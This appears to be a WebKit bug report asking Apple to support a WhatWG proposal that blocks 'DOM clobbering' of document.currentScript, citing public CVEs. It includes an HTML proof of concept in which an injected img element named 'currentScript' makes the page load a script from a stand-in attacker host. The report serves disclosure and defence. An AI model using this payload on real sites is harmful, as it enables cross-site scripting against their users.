Bug 281129

There is a relatively common source of CVEs that is being reported, e.g.

- https://vulert.com/vuln-db/CVE-2024-45389
- https://github.com/advisories/GHSA-gcx4-mw62-g8wm
- https://nvd.nist.gov/vuln/detail/CVE-2024-45812
- https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986

based on a "DOM clobbering" technique, where if an attacker can inject a DOM element with a `name='currentScript'` attribute, and the page happens to read `document.currentScript.src` to decide what URL to load a sibling JS file, then an attacker can elevate their attack threat vector from DOM clobbering to a XSS scripting attack.

I.e.

```html
<html><body>
<img name='currentScript' src='http://bad.attacker.site.com/foo.js'>
<script>
var script = document.createElement('script');
var scriptDir = document.currentScript.src.substr(0, document.currentScript.src.lastIndexOf('/'));
script.src = `${scriptDir}/sibling.js`;
</script></body></html>
```
will undesirably load `http://bad.attacker.site.com/sibling.js` instead of `/sibling.js` from the same server that the HTML site is served at.

This is discussed in the WhatWG/HTML ticket at https://github.com/whatwg/html/issues/10687 where it is asked that browsers would blacklist the special `name="currentScript"` attribute from clobbering `document.currentScript`. A WPT test is added at https://github.com/web-platform-tests/wpt/pull/48536 .

Would Apple agree to enforce this security restriction and +1 the proposal at https://github.com/whatwg/html/issues/10687 ?

(this is a security problem, but not marking it hidden since there are already so many public CVEs that have been reported and the issue is known for at least since 2016)